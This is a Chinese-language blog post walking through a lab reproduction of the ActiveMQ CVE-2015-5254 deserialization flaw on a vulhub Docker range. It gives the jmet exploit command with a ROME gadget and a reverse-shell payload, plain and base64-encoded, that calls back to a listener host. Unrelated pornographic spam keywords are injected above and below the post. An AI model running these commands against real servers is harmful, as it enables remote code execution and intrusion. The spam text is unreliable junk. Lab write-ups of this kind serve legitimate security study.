<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      CVE-2015-5254

      ActiveMQ CVE-2015-5254漏洞復現

      0. 環境搭建

      1. 安裝docker:

        curl -s https://get.docker.com/ | sh
        
      2. 搭建vulhub,使用wget下載vulhub:

        wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
        

        解壓:

        unzip vulhub-master.zip
        

        進入漏洞環境:

        cd /tools/range/activemq/CVE-2015-5254
        

        啟動環境:

        docker-compose up -d
        

        最后如圖:

      3. 啟動了CVE-2015-5254的環境,瀏覽器訪問:

        docker ps
        

        能夠看到0.0.0.0:8161-->8161/tcp 和 0.0.0.0:61616-->61616

        其中的8161端口就是管理頁面的端口,而61616則是發送消息的工作端口。

        瀏覽器訪問虛擬機ip加端口:192.168.163.128:8161

        Manage ActiveMQ 為漏洞利用點,不過需要管理員權限才能訪問,簡單點說,需要密碼,這里的默認帳密為admin/admin;所以在不清楚密碼的同時,我們需要偽造消息去讓管理員點擊。

      1. 漏洞復現

      1. 下載漏洞利用工具:

        wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
        
      2. 構造可執行命令的序列化對象,執行命令

        jmet原理是使用ysoserial生成Payload并發送(其jar內自帶ysoserial,無需再自己下載),所以我們需要在ysoserial是gadget中選擇一個可以使用的,比如ROME。

        java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/cve-2015-5254" -Yp ROME 192.168.163.128 61616
        

        命令執行如圖:

      3. 訪問管理頁面的消息隊列,點擊消息

        進入Manage ActiveMQ,點擊queue,能夠看到獲得的消息:

        進入event,查看消息:

        點擊message ID,即可成功觸發漏洞:

        進入docker查看,tmp下是否已經創建了cve-2015-5254文件:

        docker exec 541e3f -it  /bin/bash
        #541e3f -->為docker ID,使用docker ps命令能夠查看
        

        CVE-2015-5254漏洞利用成功~

      4. 反彈shell

        反彈shell,修改命令中“ ”內的命令,反彈shell命令為bash -i >& /dev/tcp/vps地址/nc監聽端口 0>&1

        漏洞利用同理,發送消息,點擊消息,命令執行:

        java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.163.128 61616
        

        bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}該語句問上面的反彈shell命令編碼過來,編碼轉換地址:http://www.jackson-t.ca/runtime-exec-payloads.html。

        點擊消息,命令執行:

        如圖:

        得到shell:


      以上為漏洞復現的整個過程,以下為在復現中遇到的問題:

      反彈shell無法成功:

      使用語句時,shell反彈不成功:

      java -jar jmet-0.1.0.all-jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.168.1.1/1234" -Yp ROME 192.168.163.128 61616
      

      解決方法:

      將反彈shell命令編碼,編碼地址在上文。

      問題:反序列漏洞利用是否bash命令是否都需要編碼?

      問了一下我的同事,需不需要編碼是要看他代碼里面寫沒寫base64,一般都是需要的,因為序列化之后的數據是給計算機看的,對于我們來說就是一段亂碼,所以一般進行一道base64編碼,能讓我們看上去舒服一些,一段數據以rO0AB開頭,你基本可以確定這串就是JAVA序列化base64加密的數據,或者如果以aced開頭,那么他就是這一段java序列化的16進制。這樣一段數據就是典型的base64編碼之后的java序列化數據:

      posted @ 2021-10-27 12:15  七先生  閱讀(431)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 夜夜夜高潮夜夜爽夜夜爰爰| 99中文字幕精品国产| 久久青草国产精品一区| 美女把尿囗扒开让男人添| 亚洲老女人区一区二视频| 99午夜精品亚洲一区二区| 亚洲一区二区三区av链接| 午夜射精日本三级| 99精品国产一区二区三区不卡| av小次郎网站| 三人成全免费观看电视剧高清| 华人在线亚洲欧美精品| 国产成人久久精品二区三| 视频一区视频二区在线视频| 国产三级黄色的在线观看| 亚洲夂夂婷婷色拍ww47| 国产欧美精品一区aⅴ影院| 亚洲女人的天堂在线观看| 日韩精品一区二区午夜成人版| 国产精品久久久久久久久久妞妞| 久久羞羞色院精品全部免费| 久久免费观看午夜成人网站| 亚洲高清 一区二区三区| 最新精品国偷自产在线| 少妇上班人妻精品偷人| 四房播色综合久久婷婷| 欧美疯狂三p群体交乱视频| 永久黄网站色视频免费直播| 少妇人妻挤奶水中文视频毛片| 国产线播放免费人成视频播放| 国自产拍偷拍精品啪啪一区二区| 国产九九视频一区二区三区| 国产午夜福利免费入口| 国产精品天天看天天狠| 国产肥妇一区二区熟女精品| 国产精品有码在线观看| 国色天香中文字幕在线视频| 天堂a无码a无线孕交| 一区二区三区一级黄色片| 九九久久自然熟的香蕉图片| 久热re这里精品视频在线6|